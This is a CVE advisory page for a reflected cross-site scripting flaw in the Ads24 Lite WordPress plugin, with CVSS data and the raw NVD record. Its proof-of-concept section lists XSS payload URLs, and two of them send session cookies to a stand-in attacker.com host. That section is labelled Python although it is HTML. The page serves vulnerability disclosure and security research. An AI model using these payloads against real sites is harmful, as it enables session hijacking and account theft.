Security Vulnerability Report
中文
CVE-2025-23458 CVSS 7.1 HIGH

CVE-2025-23458

Published: 2025-12-30 00:15:51
Last Modified: 2026-04-23 15:23:46

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rakessh Ads24 Lite wp-ad-management allows Reflected XSS.This issue affects Ads24 Lite: from n/a through <= 1.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Ads24 Lite <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-23458 Reflected XSS PoC for Ads24 Lite WordPress Plugin --> <!-- Vulnerable Parameter: Modify the URL parameter based on actual endpoint --> <!-- Basic XSS PoC --> https://target-site.com/wp-admin/admin.php?page=ads24-lite&search=<script>alert(document.cookie)</script> <!-- Image Tag XSS (Bypasses some filters) --> https://target-site.com/wp-admin/admin.php?page=ads24-lite&param=<img src=x onerror=alert('XSS')> <!-- Cookie Stealing PoC --> https://target-site.com/wp-admin/admin.php?page=ads24-lite&search=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- Session Hijacking PoC --> <script> // Create image to send cookies to attacker server new Image().src='https://attacker.com/log?cookie='+encodeURIComponent(document.cookie); </script> <!-- Stored XSS via Plugin Settings (if applicable) --> <!-- Inject payload in plugin settings fields that accept user input -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23458", "sourceIdentifier": "[email protected]", "published": "2025-12-30T00:15:51.447", "lastModified": "2026-04-23T15:23:45.703", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rakessh Ads24 Lite wp-ad-management allows Reflected XSS.This issue affects Ads24 Lite: from n/a through <= 1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-ad-management/vulnerability/wordpress-ads24-lite-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}